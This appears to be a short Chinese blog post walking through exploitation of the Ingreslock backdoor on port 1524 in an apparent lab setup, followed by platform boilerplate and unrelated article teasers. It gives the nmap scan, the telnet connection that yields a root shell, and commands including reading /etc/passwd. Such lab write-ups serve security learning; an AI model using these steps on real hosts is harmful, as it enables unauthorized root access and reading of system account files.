Nmap --- Ingreslock后门漏洞

目的:利用telnet连接目标主机的1524端口,直接获取root权限;
原理:Ingreslock后门程序运行在1524端口,连接到1524端口就能直接获得root权限,经常用于入侵一个暴露的服务器;
步骤:nmap -sV 192.168.1.3 , 扫描目标主机端口,发现目标主机开启了1524端口;
telnet 192.168.1.3 1524 连接目标主机并直接成功,
在渗透进的主机中,输入 whoami ,查看获取的权限,再输入,ifconfig eth0,查看网卡信息,再输入 cat /etc/passwd,查看主机的密码文件。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 1、第八章 Samba服务器2、第八章 NFS服务器3、第十章 Linux下DNS服务器配站点,域名解析概念命令:...
    哈熝少主阅读 9,154评论 0 10
  • 名词延伸 通俗的说,域名就相当于一个家庭的门牌号码,别人通过这个号码可以很容易的找到你。如果把IP地址比作一间房子...
    杨大虾阅读 20,683评论 2 56
  • 部分内容转载自搜狗百科 cmd是command的缩写.即命令提示符(CMD),是在OS / 2 , Windows...
    青冥之上阅读 7,003评论 0 24
  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    f675b1a02698阅读 10,743评论 0 11
  • 窗外的树叶仿佛一夜间长满了枝条 南方夏日里的雨水不停 一切鸟兽虫鸣 欣欣向荣的自然之味 大街上小鸟腿Dcup横冲直...
    萍水街阅读 3,192评论 0 1